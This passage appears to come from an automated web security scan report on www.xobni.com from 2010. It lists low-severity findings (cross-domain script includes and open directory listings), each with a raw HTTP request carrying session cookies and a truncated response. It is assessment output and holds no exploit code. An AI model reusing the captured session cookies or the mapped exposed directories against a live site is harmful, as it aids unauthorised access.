Confidence:   Certain
Host:   http://www.xobni.com
Path:   /support/index.php

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /support/index.php HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tree_session_id=455376; __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:14:19 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 200170

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Xobni - Xobni Sup
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...
</script>-->

<script type="text/javascript" src="//asset0.zendesk.com/external/zenbox/zenbox-2.0.js"></script>
...[SNIP]...

12.126. http://www.xobni.com/threaded-conversations

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /threaded-conversations

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /threaded-conversations HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/learnmore/
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:17:29 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 12774

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Thread Email Conv
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.127. http://www.xobni.com/twitter-outlook

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /twitter-outlook

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /twitter-outlook HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/huddle-outlook
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:17:41 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 13051

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Twitter from Outl
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.128. http://www.xobni.com/xing-outlook

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /xing-outlook

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /xing-outlook HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/huddle-outlook
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:18:17 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 13706

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>XING avec Xobni d
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.129. http://www.xobni.com/xlbh084ghjklyvco872656468

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /xlbh084ghjklyvco872656468

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /xlbh084ghjklyvco872656468 HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/robots.txt
Cookie: tree_session_id=455376; __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 404 Not Found
Date: Tue, 14 Dec 2010 01:18:19 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7955

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Page Not Found</T
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.130. http://www.xobni.com/xlbh084ghjklyvco872656468/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /xlbh084ghjklyvco872656468/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /xlbh084ghjklyvco872656468/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/robots.txt
Cookie: tree_session_id=455376; __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 404 Not Found
Date: Tue, 14 Dec 2010 01:18:26 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7958

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Page Not Found</T
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.131. http://www.xobni.com/xlbh084ghjklyvco872656468/jhvbil75jhsd2546s7l

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /xlbh084ghjklyvco872656468/jhvbil75jhsd2546s7l

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /xlbh084ghjklyvco872656468/jhvbil75jhsd2546s7l HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/robots.txt
Cookie: tree_session_id=455376; __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 404 Not Found
Date: Tue, 14 Dec 2010 01:18:24 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 8015

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Page Not Found</T
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.132. http://www.xobni.com/xlbh084ghjklyvco872656468/jhvbil75jhsd2546s7l/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /xlbh084ghjklyvco872656468/jhvbil75jhsd2546s7l/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /xlbh084ghjklyvco872656468/jhvbil75jhsd2546s7l/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/robots.txt
Cookie: tree_session_id=455376; __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 404 Not Found
Date: Tue, 14 Dec 2010 01:18:24 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 8018

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Page Not Found</T
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.133. http://www.xobni.com/xobni-plus

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /xobni-plus

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /xobni-plus HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/learnmore/plus/
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:16:00 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 14961

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Xobni Plus - Rech
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.134. https://www.xobni.com/support/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.xobni.com
Path:   /support/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /support/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tree_session_id=455376; __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:12:41 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 200452

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Xobni - Xobni Sup
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...
</script>-->

<script type="text/javascript" src="//asset0.zendesk.com/external/zenbox/zenbox-2.0.js"></script>
...[SNIP]...

12.135. https://www.xobni.com/videos/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.xobni.com
Path:   /videos/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /videos/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tree_session_id=455376; __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:12:41 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 9128

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Video Tutorials</
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

13. Directory listing
There are 71 instances of this issue:

Issue description

Directory listings do not necessarily constitute a security vulnerability. Any sensitive resources within your web root should be properly access-controlled in any case, and should not be accessible by an unauthorised party who happens to know the URL. Nevertheless, directory listings can aid an attacker by enabling them to quickly identify the resources at a given path, and proceed directly to analysing and attacking them.

Issue remediation

There is not usually any good reason to provide directory listings, and disabling them may place additional hurdles in the path of an attacker. This can normally be achieved in two ways:


13.1. http://www.xobni.com/enterprise/case_studies/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.xobni.com
Path:   /enterprise/case_studies/

Request

GET /enterprise/case_studies/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:13:57 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 2378
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /enterprise/case_studies</title>
</head>
<body>
<h1>Index of /enterprise/case_studies</h1>
<table><tr><th><im
...[SNIP]...
<th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a>
...[SNIP]...
<td><a href="/enterprise/">Parent Directory</a>
...[SNIP]...

13.2. http://www.xobni.com/enterprise/datasheets/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.xobni.com
Path:   /enterprise/datasheets/

Request

GET /enterprise/datasheets/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:10:08 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 1804
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /enterprise/datasheets</title>
</head>
<body>
<h1>Index of /enterprise/datasheets</h1>
<table><tr><th><img sr
...[SNIP]...
<th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a>
...[SNIP]...
<td><a href="/enterprise/">Parent Directory</a>
...[SNIP]...

13.3. http://www.xobni.com/errors/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.xobni.com
Path:   /errors/

Request

GET /errors/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:10:08 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 1534
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /errors</title>
</head>
<body>
<h1>Index of /errors</h1>
<table><tr><th><img src="/icons/blank.gif" alt="[ICO
...[SNIP]...
<th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a>
...[SNIP]...
<td><a href="/">Parent Directory</a>
...[SNIP]...

13.4. http://www.xobni.com/icons/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.xobni.com
Path:   /icons/

Request

GET /icons/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:18:17 GMT
Server: Apache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 69404

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /icons</title>
</head>
<body>
<h1>Index of /icons</h1>
<table><tr><th><img src="/icons/blank.gif" alt="[ICO]"
...[SNIP]...
<th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a>
...[SNIP]...
<td><a href="/">Parent Directory</a>
...[SNIP]...

13.5. http://www.xobni.com/images/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.xobni.com
Path:   /images/

Request

GET /images/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:14:31 GMT
Server: Apache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 13436

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /images</title>
</head>
<body>
<h1>Index of /images</h1>
<table><tr><th><img src="/icons/blank.gif" alt="[ICO
...[SNIP]...
<th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a>
...[SNIP]...
<td><a href="/">Parent Directory</a>
...[SNIP]...

13.6. http://www.xobni.com/images/badge/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.xobni.com
Path:   /images/badge/

Request

GET /images/badge/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/images/
Cookie: tree_session_id=455376; __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:14:32 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 1206
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /images/badge</title>
</head>
<body>
<h1>Index of /images/badge</h1>
<table><tr><th><img src="/icons/blank.gi
...[SNIP]...
<th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a>
...[SNIP]...
<td><a href="/images/">Parent Directory</a>
...[SNIP]...

13.7. http://www.xobni.com/images/banners/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.xobni.com
Path:   /images/banners/

Request

GET /images/banners/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:14:31 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 1462
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /images/banners</title>
</head>
<body>
<h1>Index of /images/banners</h1>
<table><tr><th><img src="/icons/blan
...[SNIP]...
<th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a>
...[SNIP]...
<td><a href="/images/">Parent Directory</a>
...[SNIP]...

13.8. http://www.xobni.com/images/buttons/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.xobni.com
Path:   /images/buttons/

Request

GET /images/buttons/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/images/
Cookie: tree_session_id=455376; __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:14:32 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 1216
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /images/buttons</title>
</head>
<body>
<h1>Index of /images/buttons</h1>
<table><tr><th><img src="/icons/blan
...[SNIP]...
<th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a>
...[SNIP]...
<td><a href="/images/">Parent Directory</a>
...[SNIP]...

13.9. http://www.xobni.com/images/client/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.xobni.com
Path:   /images/client/

Request

GET /images/client/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
